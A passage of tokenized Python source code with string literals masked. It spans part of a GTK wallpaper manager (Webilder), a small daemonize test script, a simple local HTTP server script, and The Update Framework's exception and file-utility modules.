ypos ) <EOL> if not path : <EOL> return <EOL> if not ( event . state & gtk . gdk . CONTROL_MASK ) : <EOL> icon_view . unselect_all ( ) <EOL> icon_view . select_path ( path ) <EOL> self . image_popup . top_widget . popup ( None , None , None , event . button , <EOL> event . time ) <EOL> return False <EOL> def collection_tree_changed ( self , * _args ) : <EOL> """<STR_LIT>""" <EOL> self . load_collection_tree ( config . get ( '<STR_LIT>' ) ) <EOL> def on_quit_handle_activate ( self , _event ) : <EOL> """<STR_LIT>""" <EOL> self . on_WebilderDesktopWindow_handle_delete_event ( None , None ) <EOL> def on_about_handle_activate ( self , _event ) : <EOL> """<STR_LIT>""" <EOL> AboutDialog . show_about_dialog ( '<STR_LIT>' ) <EOL> def on_WebilderDesktopWindow_handle_delete_event ( self , _widget , _event ) : <EOL> """<STR_LIT>""" <EOL> self . save_window_state ( ) <EOL> self . destroy ( ) <EOL> return False <EOL> def save_window_state ( self ) : <EOL> """<STR_LIT>""" <EOL> top = self . top_widget <EOL> layout = { '<STR_LIT>' : top . get_position ( ) , <EOL> '<STR_LIT>' : top . get_size ( ) , <EOL> '<STR_LIT>' : self . hpaned . get_position ( ) , <EOL> '<STR_LIT>' : self . photo_info_expander . get_expanded ( ) , } <EOL> config . set ( '<STR_LIT>' , layout ) <EOL> config . save_config ( ) <EOL> def restore_window_state ( self ) : <EOL> """<STR_LIT>""" <EOL> d = config . get ( '<STR_LIT>' ) <EOL> if d . has_key ( '<STR_LIT>' ) : <EOL> self . top_widget . move ( * d [ '<STR_LIT>' ] ) <EOL> if d . has_key ( '<STR_LIT>' ) : <EOL> self . top_widget . resize ( * d [ '<STR_LIT>' ] ) <EOL> if d . has_key ( '<STR_LIT>' ) : <EOL> self . hpaned . set_position ( d [ '<STR_LIT>' ] ) <EOL> if d . has_key ( '<STR_LIT>' ) : <EOL> self . photo_info_expander . set_expanded ( d [ '<STR_LIT>' ] ) <EOL> def on_file_webshots_import_handle_activate ( self , _event ) : <EOL> """<STR_LIT>""" <EOL> dlg = gtk . FileChooserDialog ( <EOL> _ ( '<STR_LIT>' ) , <EOL> None , <EOL> action = gtk . FILE_CHOOSER_ACTION_OPEN , <EOL> buttons = ( _ ( "<STR_LIT>" ) , gtk . RESPONSE_OK , _ ( "<STR_LIT>" ) , <EOL> gtk . RESPONSE_CANCEL ) ) <EOL> dlg . set_select_multiple ( True ) <EOL> try : <EOL> response = dlg . run ( ) <EOL> if response == gtk . RESPONSE_OK : <EOL> files = dlg . get_filenames ( ) <EOL> else : <EOL> files = [ ] <EOL> finally : <EOL> dlg . destroy ( ) <EOL> import_files ( files ) <EOL> def on_donate_handle_activate ( self , _widget ) : <EOL> """<STR_LIT>""" <EOL> donate_dialog = DonateDialog ( ) <EOL> donate_dialog . run ( ) <EOL> donate_dialog . destroy ( ) <EOL> def on_photo_properties_handle_activate ( self , _event ) : <EOL> """<STR_LIT>""" <EOL> selected = self . iconview . get_selected_items ( ) <EOL> if not selected : <EOL> return <EOL> win = UITricks ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> selected = selected [ - <NUM_LIT:1> ] <EOL> path = selected <EOL> iterator = self . iconview . get_model ( ) . get_iter ( path ) <EOL> data = self . iconview . get_model ( ) . get_value ( iterator , <EOL> IV_DATA_COLUMN ) <EOL> win . title . set_markup ( '<STR_LIT>' % data [ '<STR_LIT:title>' ] ) <EOL> win . album . set_markup ( data [ '<STR_LIT>' ] ) <EOL> win . file . set_text ( data [ '<STR_LIT:filename>' ] ) <EOL> win . tags . set_text ( data [ '<STR_LIT>' ] ) <EOL> win . size . set_text ( _ ( '<STR_LIT>' ) % ( os . path . getsize ( data [ '<STR_LIT:filename>' ] ) / <EOL> <NUM_LIT> ) ) <EOL> win . date . set_text ( time . strftime ( '<STR_LIT>' , time . localtime ( os . path . getctime ( <EOL> data [ '<STR_LIT:filename>' ] ) ) ) ) <EOL> win . url . set_text ( data [ '<STR_LIT>' ] . get ( '<STR_LIT:url>' , '<STR_LIT>' ) ) <EOL> win . closebutton . connect ( '<STR_LIT>' , lambda * args : win . destroy ( ) ) <EOL> win . show ( ) <EOL> def sort_photos ( self , model ) : <EOL> """<STR_LIT>""" <EOL> if model is None : <EOL> return <EOL> def sort_by_date ( data1 , data2 ) : <EOL> """<STR_LIT>""" <EOL> return - cmp ( data1 [ '<STR_LIT>' ] , data2 [ '<STR_LIT>' ] ) <EOL> def sort_by_title ( data1 , data2 ) : <EOL> """<STR_LIT>""" <EOL> return cmp ( data1 [ '<STR_LIT:title>' ] , data2 [ '<STR_LIT:title>' ] ) <EOL> sort_func = { <NUM_LIT:0> : sort_by_title , <EOL> <NUM_LIT:1> : sort_by_date } [ self . sort_combo . get_active ( ) ] <EOL> model . set_default_sort_func ( lambda m , iter1 , iter2 : <EOL> sort_func ( <EOL> m . get_value ( iter1 , IV_DATA_COLUMN ) , <EOL> m . get_value ( iter2 , IV_DATA_COLUMN ) , <EOL> ) ) <EOL> model . set_sort_column_id ( - <NUM_LIT:1> , gtk . SORT_ASCENDING ) <EOL> del model <EOL> def on_sort_combo_handle_changed ( self , _widget ) : <EOL> """<STR_LIT>""" <EOL> self . sort_photos ( self . iconview . get_model ( ) ) <EOL> def on_delete_handle_activate ( self , _widget ) : <EOL> """<STR_LIT>""" <EOL> delete_files ( self , forever = False ) <EOL> class ImagePopup ( UITricks ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , main_window ) : <EOL> self . main_window = main_window <EOL> self . on_view_full_screen_handle_activate = ( <EOL> main_window . on_view_fullscreen_handle_activate ) <EOL> self . on_set_as_wallpaper_handle_activate = ( <EOL> main_window . on_set_as_wallpaper_handle_activate ) <EOL> self . on_photo_properties_handle_activate = ( <EOL> main_window . on_photo_properties_handle_activate ) <EOL> UITricks . __init__ ( self , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> def on_delete_images_handle_activate ( self , _event ) : <EOL> """<STR_LIT>""" <EOL> delete_files ( self . main_window , forever = False ) <EOL> def on_delete_forever_handle_activate ( self , _event ) : <EOL> """<STR_LIT>""" <EOL> delete_files ( self . main_window , forever = True ) <EOL> def delete_files ( main_window , forever ) : <EOL> """<STR_LIT>""" <EOL> iconview = main_window . iconview <EOL> selected = iconview . get_selected_items ( ) <EOL> if selected and len ( selected ) > <NUM_LIT:1> : <EOL> if forever : <EOL> message = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> else : <EOL> message = _ ( '<STR_LIT>' ) <EOL> dlg = gtk . MessageDialog ( type = gtk . MESSAGE_QUESTION , <EOL> buttons = gtk . BUTTONS_YES_NO , <EOL> message_format = message ) <EOL> response = dlg . run ( ) <EOL> dlg . destroy ( ) <EOL> if response != gtk . RESPONSE_YES : <EOL> return <EOL> banned = open ( os . path . expanduser ( '<STR_LIT>' ) , '<STR_LIT:a>' ) <EOL> model = iconview . get_model ( ) <EOL> monitor = main_window . collection_monitor <EOL> if monitor [ '<STR_LIT>' ] is not None : <EOL> gnomevfs . monitor_cancel ( monitor [ '<STR_LIT>' ] ) <EOL> monitor [ '<STR_LIT>' ] = None <EOL> for path in selected : <EOL> iterator = model . get_iter ( path ) <EOL> data = model . get_value ( iterator , <EOL> IV_DATA_COLUMN ) <EOL> for fname in ( data [ '<STR_LIT:filename>' ] , data [ '<STR_LIT>' ] , data [ '<STR_LIT>' ] ) : <EOL> try : <EOL> os . remove ( fname ) <EOL> except ( IOError , OSError ) : <EOL> pass <EOL> if forever : <EOL> banned . write ( os . path . basename ( data [ '<STR_LIT:filename>' ] ) + '<STR_LIT:\n>' ) <EOL> model . remove ( iterator ) <EOL> if monitor [ '<STR_LIT>' ] : <EOL> monitor [ '<STR_LIT>' ] = gnomevfs . monitor_add ( <EOL> monitor [ '<STR_LIT>' ] , <EOL> gnomevfs . MONITOR_DIRECTORY , <EOL> main_window . collection_directory_changed ) <EOL> banned . close ( ) <EOL> HTML_ESCAPE_TABLE = { <EOL> "<STR_LIT:&>" : "<STR_LIT>" , <EOL> '<STR_LIT:">' : "<STR_LIT>" , <EOL> "<STR_LIT:'>" : "<STR_LIT>" , <EOL> "<STR_LIT:>>" : "<STR_LIT>" , <EOL> "<STR_LIT:<>" : "<STR_LIT>" , <EOL> } <EOL> def html_escape ( text ) : <EOL> """<STR_LIT>""" <EOL> output = [ ] <EOL> for char in text : <EOL> output . append ( HTML_ESCAPE_TABLE . get ( char , char ) ) <EOL> return "<STR_LIT>" . join ( output ) <EOL> class DonateDialog ( UITricks ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> UITricks . __init__ ( self , '<STR_LIT>' , '<STR_LIT>' ) <EOL> text = _ ( '''<STR_LIT>''' ) <EOL> stats = config . get ( '<STR_LIT>' ) <EOL> self . url = '<STR_LIT>' <EOL> context = dict ( <EOL> downloads = stats [ '<STR_LIT>' ] , <EOL> rotations = stats [ '<STR_LIT>' ] , <EOL> inst_date = time . strftime ( '<STR_LIT>' ) , <EOL> url = self . url <EOL> ) <EOL> self . donate_copy . set_markup ( text % context ) <EOL> def run ( self ) : <EOL> val = UITricks . run ( self ) <EOL> if val == <NUM_LIT:0> : <EOL> open_browser ( self . url , no_browser_title = _ ( '<STR_LIT>' ) , <EOL> no_browser_markup = _ ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) % self . url ) <EOL> def configure ( ) : <EOL> """<STR_LIT>""" <EOL> reload_config ( ) <EOL> config_dialog . ConfigDialog ( ) . run_dialog ( config ) <EOL> def import_files ( files ) : <EOL> success_count = <NUM_LIT:0> <EOL> for afile in files : <EOL> try : <EOL> success_count += wbz_handler . handle_file ( afile ) <EOL> except ( IOError , KeyError , ValueError ) , e : <EOL> mbox = gtk . MessageDialog ( type = gtk . MESSAGE_ERROR , <EOL> buttons = gtk . BUTTONS_OK ) <EOL> mbox . set_title ( _ ( "<STR_LIT>" ) ) <EOL> mbox . set_markup ( _ ( "<STR_LIT>" ) % ( afile , e ) ) <EOL> mbox . run ( ) <EOL> mbox . destroy ( ) <EOL> if success_count : <EOL> mbox = gtk . MessageDialog ( type = gtk . MESSAGE_INFO , <EOL> buttons = gtk . BUTTONS_OK ) <EOL> mbox . set_title ( _ ( "<STR_LIT>" ) ) <EOL> mbox . set_markup ( _ ( "<STR_LIT>" ) <EOL> % success_count ) <EOL> mbox . run ( ) <EOL> mbox . destroy ( ) <EOL> def main ( ) : <EOL> """<STR_LIT>""" <EOL> parser = optparse . OptionParser ( ) <EOL> parser . add_option ( <EOL> '<STR_LIT>' , dest = "<STR_LIT>" , help = "<STR_LIT>" <EOL> "<STR_LIT>" , action = "<STR_LIT:store_true>" , default = False ) <EOL> parser . add_option ( <EOL> '<STR_LIT>' , dest = "<STR_LIT>" , help = "<STR_LIT>" , <EOL> action = "<STR_LIT:store_true>" , default = False ) <EOL> options , args = parser . parse_args ( ) <EOL> gtk . gdk . threads_init ( ) <EOL> if options . configure : <EOL> configure ( ) <EOL> return <EOL> if options . download : <EOL> download_dialog = DownloadDialog . DownloadProgressDialog ( config ) <EOL> main_window = download_dialog <EOL> download_dialog . top_widget . connect ( '<STR_LIT>' , gtk . main_quit ) <EOL> download_dialog . show ( ) <EOL> gtk . main ( ) <EOL> return <EOL> if args : <EOL> import_files ( args ) <EOL> return <EOL> main_window = WebilderDesktopWindow ( ) <EOL> main_window . top_widget . connect ( "<STR_LIT>" , gtk . main_quit ) <EOL> gtk . main ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> from sys import argv <EOL> from daemonize import Daemonize <EOL> pid = argv [ <NUM_LIT:1> ] <EOL> working_dir = argv [ <NUM_LIT:2> ] <EOL> file_name = argv [ <NUM_LIT:3> ] <EOL> def main ( ) : <EOL> with open ( file_name , "<STR_LIT:w>" ) as f : <EOL> f . write ( "<STR_LIT:test>" ) <EOL> daemon = Daemonize ( app = "<STR_LIT>" , pid = pid , action = main , chdir = working_dir ) <EOL> daemon . start ( ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function <EOL> from __future__ import absolute_import <EOL> from __future__ import division <EOL> from __future__ import unicode_literals <EOL> import sys <EOL> import random <EOL> import six <EOL> PORT = <NUM_LIT:0> <EOL> def _port_gen ( ) : <EOL> return random . randint ( <NUM_LIT> , <NUM_LIT> ) <EOL> if len ( sys . argv ) > <NUM_LIT:1> : <EOL> try : <EOL> PORT = int ( sys . argv [ <NUM_LIT:1> ] ) <EOL> if PORT < <NUM_LIT> or PORT > <NUM_LIT> : <EOL> raise ValueError <EOL> except ValueError : <EOL> PORT = _port_gen ( ) <EOL> else : <EOL> PORT = _port_gen ( ) <EOL> Handler = six . moves . SimpleHTTPServer . SimpleHTTPRequestHandler <EOL> httpd = six . moves . socketserver . TCPServer ( ( '<STR_LIT>' , PORT ) , Handler ) <EOL> httpd . serve_forever ( ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function <EOL> from __future__ import absolute_import <EOL> from __future__ import division <EOL> from __future__ import unicode_literals <EOL> import six <EOL> import logging <EOL> logger = logging . getLogger ( '<STR_LIT>' ) <EOL> __all__ = [ '<STR_LIT>' ] <EOL> class Error ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class Warning ( Warning ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class FormatError ( Error ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class InvalidMetadataJSONError ( FormatError ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , exception ) : <EOL> self . exception = exception <EOL> def __str__ ( self ) : <EOL> return repr ( self . exception ) <EOL> class UnsupportedAlgorithmError ( Error ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class BadHashError ( Error ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , expected_hash , observed_hash ) : <EOL> self . expected_hash = expected_hash <EOL> self . observed_hash = observed_hash <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' + repr ( self . observed_hash ) + '<STR_LIT>' + repr ( self . expected_hash ) + '<STR_LIT:)>' <EOL> class BadVersionNumberError ( Error ) : <EOL> """<STR_LIT>""" <EOL> class BadPasswordError ( Error ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class UnknownKeyError ( Error ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class RepositoryError ( Error ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class InsufficientKeysError ( Error ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class ForbiddenTargetError ( RepositoryError ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class ExpiredMetadataError ( Error ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class ReplayedMetadataError ( RepositoryError ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , metadata_role , previous_version , current_version ) : <EOL> self . metadata_role = metadata_role <EOL> self . previous_version = previous_version <EOL> self . current_version = current_version <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' + repr ( self . metadata_role ) + '<STR_LIT>' + repr ( self . previous_version ) + '<STR_LIT>' + '<STR_LIT>' + repr ( self . current_version ) + '<STR_LIT>' <EOL> class CryptoError ( Error ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class BadSignatureError ( CryptoError ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , metadata_role_name ) : <EOL> self . metadata_role_name = metadata_role_name <EOL> def __str__ ( self ) : <EOL> return repr ( self . metadata_role_name ) + '<STR_LIT>' <EOL> class UnknownMethodError ( CryptoError ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class UnsupportedLibraryError ( Error ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class DecompressionError ( Error ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , exception ) : <EOL> self . exception = exception <EOL> def __str__ ( self ) : <EOL> return repr ( self . exception ) <EOL> class DownloadError ( Error ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class DownloadLengthMismatchError ( DownloadError ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , expected_length , observed_length ) : <EOL> self . expected_length = expected_length <EOL> self . observed_length = observed_length <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' + repr ( self . observed_length ) + '<STR_LIT>' + repr ( self . expected_length ) + '<STR_LIT>' <EOL> class SlowRetrievalError ( DownloadError ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , average_download_speed ) : <EOL> self . __average_download_speed = average_download_speed <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' + repr ( self . __average_download_speed ) + '<STR_LIT>' <EOL> class KeyAlreadyExistsError ( Error ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class RoleAlreadyExistsError ( Error ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class UnknownRoleError ( Error ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class UnknownTargetError ( Error ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class InvalidNameError ( Error ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class UnsignedMetadataError ( Error ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , message , signable ) : <EOL> self . exception_message = message <EOL> self . signable = signable <EOL> def __str__ ( self ) : <EOL> return self . exception_message <EOL> class NoWorkingMirrorError ( Error ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , mirror_errors ) : <EOL> self . mirror_errors = mirror_errors <EOL> def __str__ ( self ) : <EOL> all_errors = '<STR_LIT>' <EOL> for mirror_url , mirror_error in six . iteritems ( self . mirror_errors ) : <EOL> try : <EOL> mirror_url_tokens = six . moves . urllib . parse . urlparse ( mirror_url ) <EOL> except : <EOL> logger . exception ( '<STR_LIT>' + repr ( mirror_url ) ) <EOL> mirror_netloc = mirror_url <EOL> else : <EOL> mirror_netloc = mirror_url_tokens . netloc <EOL> all_errors += '<STR_LIT>' + repr ( mirror_netloc ) + '<STR_LIT>' + repr ( mirror_error ) <EOL> return all_errors <EOL> class NotFoundError ( Error ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class URLMatchesNoPatternError ( Error ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class InvalidConfigurationError ( Error ) : <EOL> """<STR_LIT>""" <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function <EOL> from __future__ import absolute_import <EOL> from __future__ import division <EOL> from __future__ import unicode_literals <EOL> import os <EOL> import sys <EOL> import gzip <EOL> import shutil <EOL> import logging <EOL> import tempfile <EOL> import tuf <EOL> import tuf . hash <EOL> import tuf . conf <EOL> import tuf . formats <EOL> import six <EOL> HASH_FUNCTION = '<STR_LIT>' <EOL> logger = logging . getLogger ( '<STR_LIT>' ) <EOL> class TempFile ( object ) : <EOL> """<STR_LIT>""" <EOL> def _default_temporary_directory ( self , prefix ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> self . temporary_file = tempfile . NamedTemporaryFile ( prefix = prefix ) <EOL> except OSError as err : <EOL> logger . critical ( '<STR_LIT>' + repr ( err ) ) <EOL> raise tuf . Error ( err ) <EOL> def __init__ ( self , prefix = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> self . _compression = None <EOL> self . _orig_file = None <EOL> temp_dir = tuf . conf . temporary_directory <EOL> if temp_dir is not None and tuf . formats . PATH_SCHEMA . matches ( temp_dir ) : <EOL> try : <EOL> self . temporary_file = tempfile . NamedTemporaryFile ( prefix = prefix , <EOL> dir = temp_dir ) <EOL> except OSError as err : <EOL> logger . error ( '<STR_LIT>' + temp_dir + '<STR_LIT>' + repr ( err ) ) <EOL> logger . error ( '<STR_LIT>' ) <EOL> self . _default_temporary_directory ( prefix ) <EOL> else : <EOL> self . _default_temporary_directory ( prefix ) <EOL> def get_compressed_length ( self ) : <EOL> """<STR_LIT>""" <EOL> return os . stat ( self . temporary_file . name ) . st_size <EOL> def flush ( self ) : <EOL> """<STR_LIT>""" <EOL> self . temporary_file . flush ( ) <EOL> def read ( self , size = None ) : <EOL> """<STR_LIT>""" <EOL> if size is None : <EOL> self . temporary_file . seek ( <NUM_LIT:0> ) <EOL> data = self . temporary_file . read ( ) <EOL> self . temporary_file . seek ( <NUM_LIT:0> ) <EOL> return data <EOL> else : <EOL> if not ( isinstance ( size , int ) and size > <NUM_LIT:0> ) : <EOL> raise tuf . FormatError <EOL> return self . temporary_file . read ( size ) <EOL> def write ( self , data , auto_flush = True ) : <EOL> """<STR_LIT>""" <EOL> self . temporary_file . write ( data ) <EOL> if auto_flush : <EOL> self . flush ( ) <EOL> def move ( self , destination_path ) : <EOL> """<STR_LIT>""" <EOL> self . flush ( ) <EOL> self . seek ( <NUM_LIT:0> ) <EOL> destination_file = open ( destination_path , '<STR_LIT:wb>' ) <EOL> shutil . copyfileobj ( self . temporary_file , destination_file ) <EOL> destination_file . close ( ) <EOL> self . close_temp_file ( ) <EOL> def seek ( self , * args ) : <EOL> """<STR_LIT>""" <EOL> self . temporary_file . seek ( * args ) <EOL> def decompress_temp_file_object ( self , compression ) : <EOL> """<STR_LIT>""" <EOL> tuf . formats . NAME_SCHEMA . check_match ( compression ) <EOL> if self . _orig_file is not None : <EOL> raise tuf . Error ( '<STR_LIT>' ) <EOL> if compression != '<STR_LIT>' : <EOL> raise tuf . Error ( '<STR_LIT>' ) <EOL> self . seek ( <NUM_LIT:0> ) <EOL> self . _compression = compression <EOL> self . _orig_file = self . temporary_file <EOL> try : <EOL> gzip_file_object = gzip . GzipFile ( fileobj = self . temporary_file , mode = '<STR_LIT:rb>' ) <EOL> uncompressed_content = gzip_file_object . read ( ) <EOL> self . temporary_file = tempfile . NamedTemporaryFile ( ) <EOL> self . temporary_file . write ( uncompressed_content ) <EOL> self . flush ( ) <EOL> except Exception as exception : <EOL> raise tuf . DecompressionError ( exception ) <EOL> def close_temp_file ( self ) : <EOL> """<STR_LIT>""" <EOL> self . temporary_file . close ( ) <EOL> if self . _orig_file is not None : <EOL> self . _orig_file . close ( ) <EOL> def get_file_details ( filepath , hash_algorithms = [ '<STR_LIT>' ] ) : <EOL> """<STR_LIT>""" <EOL> tuf . formats . PATH_SCHEMA . check_match ( filepath ) <EOL> tuf . formats . HASHALGORITHMS_SCHEMA . check_match ( hash_algorithms ) <EOL> file_hashes = { } <EOL> if not os . path . exists ( filepath ) : <EOL> raise tuf . Error ( '<STR_LIT>' + repr ( filepath ) + '<STR_LIT>' ) <EOL> filepath = os . path . abspath ( filepath ) <EOL> file_length = os . path . getsize ( filepath ) <EOL> for algorithm in hash_algorithms : <EOL> digest_object = tuf . hash . digest_filename ( filepath , algorithm ) <EOL> file_hashes . update ( { algorithm : digest_object . hexdigest ( ) } ) <EOL> tuf . formats . HASHDICT_SCHEMA . check_match ( file_hashes ) <EOL> return file_length , file_hashes <EOL> def ensure_parent_dir ( filename ) : <EOL> """<STR_LIT>""" <EOL> tuf . formats . PATH_SCHEMA . check_match ( filename ) <EOL> directory = os . path . split ( filename ) [ <NUM_LIT:0> ] <EOL> if directory and not os . path . exists ( directory ) : <EOL> os . makedirs ( directory , <NUM_LIT> ) <EOL> def file_in_confined_directories ( filepath , confined_directories ) : <EOL> """<STR_LIT>""" <EOL> tuf . formats . RELPATH_SCHEMA . check_match ( filepath ) <EOL> tuf . formats . RELPATHS_SCHEMA . check_match ( confined_directories ) <EOL> for confined_directory in confined_directories : <EOL> if confined_directory == '<STR_LIT>' : <EOL> return True <EOL> filepath = os . path . normpath ( filepath ) <EOL> confined_directory = os . path . normpath ( confined_directory ) <EOL> if os . path . dirname ( filepath ) == confined_directory : <EOL> return True <EOL> return False <EOL> def find_delegated_role ( roles , delegated_role ) : <EOL> """<STR_LIT>""" <EOL> tuf . formats . ROLELIST_SCHEMA . check_match ( roles ) <EOL> tuf . formats . ROLENAME_SCHEMA . check_match ( delegated_role ) <EOL> role_index = None <EOL> for index in six . moves . xrange ( len ( roles ) ) : <EOL> role = roles [ index ] <EOL> name = role . get ( '<STR_LIT:name>' ) <EOL> if name is None : <EOL> no_name_message = '<STR_LIT>' <EOL> raise tuf . RepositoryError ( no_name_message ) <EOL> else : <EOL> if name == delegated_role : <EOL> if role_index is None : <EOL> role_index = index <EOL> else : <EOL> duplicate_role_message = '<STR_LIT>' + str ( delegated_role ) + '<STR_LIT>' <EOL> raise tuf . RepositoryError ( duplicate_role_message ) <EOL> else : <EOL> logger . debug ( '<STR_LIT>' + repr ( delegated_role ) ) <EOL> return role_index <EOL> def ensure_all_targets_allowed ( rolename , list_of_targets , parent_delegations ) : <EOL> """<STR_LIT>""" <EOL> tuf . formats . ROLENAME_SCHEMA . check_match ( rolename ) <EOL> tuf . formats . RELPATHS_SCHEMA . check_match ( list_of_targets ) <EOL> tuf . formats . DELEGATIONS_SCHEMA . check_match ( parent_delegations ) <EOL> if rolename == '<STR_LIT>' : <EOL> return <EOL> roles = parent_delegations [ '<STR_LIT>' ] <EOL> role_index = find_delegated_role ( roles , rolename ) <EOL> if role_index is not None : <EOL> role = roles [ role_index ] <EOL> allowed_child_paths = role . get ( '<STR_LIT>' ) <EOL> allowed_child_path_hash_prefixes = role . get ( '<STR_LIT>' ) <EOL> actual_child_targets = list_of_targets <EOL> if allowed_child_path_hash_prefixes is not None : <EOL> consistent = paths_are_consistent_with_hash_prefixes <EOL> if not consistent ( actual_child_targets , <EOL> allowed_child_path_hash_prefixes ) : <EOL> message = repr ( rolename ) + '<STR_LIT>' + '<STR_LIT>' <EOL> raise tuf . ForbiddenTargetError ( message ) <EOL> elif allowed_child_paths is not None : <EOL> for child_target in actual_child_targets : <EOL> for allowed_child_path in allowed_child_paths : <EOL> prefix = os . path . commonprefix ( [ child_target , allowed_child_path ] ) <EOL> if prefix == allowed_child_path : <EOL> break <EOL> else : <EOL> raise tuf . ForbiddenTargetError ( '<STR_LIT>' + repr ( rolename ) + '<STR_LIT>' + '<STR_LIT>' + repr ( child_target ) + '<STR_LIT:U+002C>' + '<STR_LIT>' + '<STR_LIT>' + '<STR_LIT>' ) <EOL> else : <EOL> raise tuf . FormatError ( repr ( role ) + '<STR_LIT>' + '<STR_LIT>' + '<STR_LIT>' ) <EOL> else : <EOL> raise tuf . RepositoryError ( '<STR_LIT>' + repr ( rolename ) + '<STR_LIT:.>' ) <EOL> def paths_are_consistent_with_hash_prefixes ( paths , path_hash_prefixes ) : <EOL> """<STR_LIT>""" <EOL> tuf . formats . RELPATHS_SCHEMA . check_match ( paths ) <EOL> tuf . formats . PATH_HASH_PREFIXES_SCHEMA . check_match ( path_hash_prefixes ) <EOL> consistent = False <EOL> for path in paths : <EOL> path_hash = get_target_hash ( path ) <EOL> consistent = False <EOL> for path_hash_prefix in path_hash_prefixes : <EOL> if path_hash . startswith ( path_hash_prefix ) : <EOL> consistent = True <EOL> break <EOL> if not consistent : <EOL> break <EOL> return consistent <EOL> def get_target_hash ( target_filepath ) : <EOL> """<STR_LIT>""" <EOL> tuf . formats . RELPATH_SCHEMA . check_match ( target_filepath ) <EOL> digest_object = tuf . hash . digest ( HASH_FUNCTION ) <EOL> encoded_target_filepath = target_filepath . encode ( '<STR_LIT:utf-8>' ) <EOL> digest_object . update ( encoded_target_filepath ) <EOL> target_filepath_hash = digest_object . hexdigest ( ) <EOL> return target_filepath_hash <EOL> _json_module = None <EOL> def import_json ( ) : <EOL> """<STR_LIT>""" <EOL> global _json_module <EOL> if _json_module is not None : <EOL> return _json_module <EOL> else : <EOL> try : <EOL> module = __import__ ( '<STR_LIT>' ) <EOL> except ImportError : <EOL> raise ImportError ( '<STR_LIT>' ) <EOL> else : <EOL> _json_module = module <EOL> return module <EOL> json = import_json ( ) <EOL> def load_json_string ( data ) : <EOL> """<STR_LIT>""" <EOL> deserialized_object = None <EOL> try : <EOL> deserialized_object = json . loads ( data ) <EOL> except TypeError : <EOL> message = '<STR_LIT>' + repr ( data ) <EOL> raise tuf . Error ( message ) <EOL> except ValueError : <EOL> message = '<STR_LIT>' + repr ( data ) <EOL> raise tuf . Error ( message ) <EOL> else : <EOL> return deserialized_object <EOL> def load_json_file ( filepath ) : <EOL> """<STR_LIT>""" <EOL> tuf . formats . PATH_SCHEMA . check_match ( filepath ) <EOL> deserialized_object = None <EOL> if filepath . endswith ( '<STR_LIT>' ) : <EOL> logger . debug ( '<STR_LIT>' + str ( filepath ) + '<STR_LIT:)>' ) <EOL> fileobject = six . StringIO ( gzip . open ( filepath ) . read ( ) . decode ( '<STR_LIT:utf-8>' ) ) <EOL> else : <EOL> logger . debug ( '<STR_LIT>' + str ( filepath ) + '<STR_LIT:)>' ) <EOL> fileobject = open ( filepath ) <EOL> try : <EOL> deserialized_object = json . load ( fileobject ) <EOL> except ( ValueError , TypeError ) as e : <EOL> message = '<STR_LIT>' + repr ( filepath ) <EOL> raise tuf . Error ( message ) <EOL> else : <EOL> fileobject . close ( ) <EOL> return deserialized_object <EOL> finally : <EOL> fileobject . close ( ) <EOL> def digests_are_equal ( digest1 , digest2 ) : <EOL> """<STR_LIT>""" <EOL> tuf . formats . HEX_SCHEMA . check_match ( digest1 ) <EOL> tuf . formats . HEX_SCHEMA . check_match ( digest2 ) <EOL> if len ( digest1 ) != len ( digest2 ) : <EOL> return False <EOL> are_equal = True <EOL> for element in range ( len ( digest1 ) ) : <EOL> if digest1 [ element ] != digest2 [ element ] : <EOL> are_equal = False <EOL> return are_equal </s>
